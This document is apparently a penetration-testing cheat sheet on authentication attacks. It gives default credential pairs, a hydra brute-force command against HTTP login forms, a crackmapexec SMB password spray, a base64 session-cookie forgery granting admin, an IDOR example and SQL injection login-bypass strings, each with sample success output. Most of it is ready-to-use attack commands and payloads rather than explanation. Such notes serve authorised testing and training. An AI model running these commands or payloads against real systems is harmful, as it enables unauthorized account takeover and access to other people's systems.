AUTHENTICATION ATTACKS

Default credentials

Try known defaults first — Always the first thing to try

admin:admin, admin:password, root:root
Google: '<application> default credentials'
Example Output
admin:admin -> 'Login successful'
OR: admin:password -> 'Welcome, Administrator'
(Always try these FIRST before brute forcing)

Brute force login

HTTP form brute force — Get exact form fields from Burp

hydra -l admin -P /usr/share/wordlists/rockyou.txt $IP http-post-form '/login:username=^USER^&password=^PASS^:F=Invalid'
Example Output
hydra -l admin -P rockyou.txt 10.10.10.5 pop3
[110][pop3] login: admin password: welcome1
(Crack mail credentials)

Password spray

One password, many users — Avoids lockouts

crackmapexec smb $IP -u users.txt -p 'Password1' --continue-on-success
Example Output
crackmapexec smb 10.10.10.5 -u users.txt -p 'Password1'
[-] corp\admin:Password1
[-] corp\john:Password1
[+] corp\jane:Password1
(One hit across many users)

Session hijacking

JWT, base64 encoded tokens — Weak session management

Check cookies for session tokens, try to decode/forge
Example Output
Cookie: session=eyJhZG1pbiI6ZmFsc2V9
base64 decode: {"admin":false}
Change to: {"admin":true}
base64 encode: eyJhZG1pbiI6dHJ1ZX0=
Set cookie and refresh -> Admin access!

Registration / password reset

Create test@test.com — Sometimes leads to admin access

Register a new account, look for IDOR or priv escalation
Example Output
Register: testuser@test.com
Login -> see profile page
Change URL: /profile?id=1 (was id=5)
Now viewing admin's profile = IDOR
OR: Reset admin password via manipulated token

SQL injection on login

Bypass authentication — Classic SQLi login bypass

admin' OR 1=1-- -
admin'-- -
Example Output
Username: admin'-- -
Password: anything

Result: Logged in as admin
(Authentication bypassed via SQLi)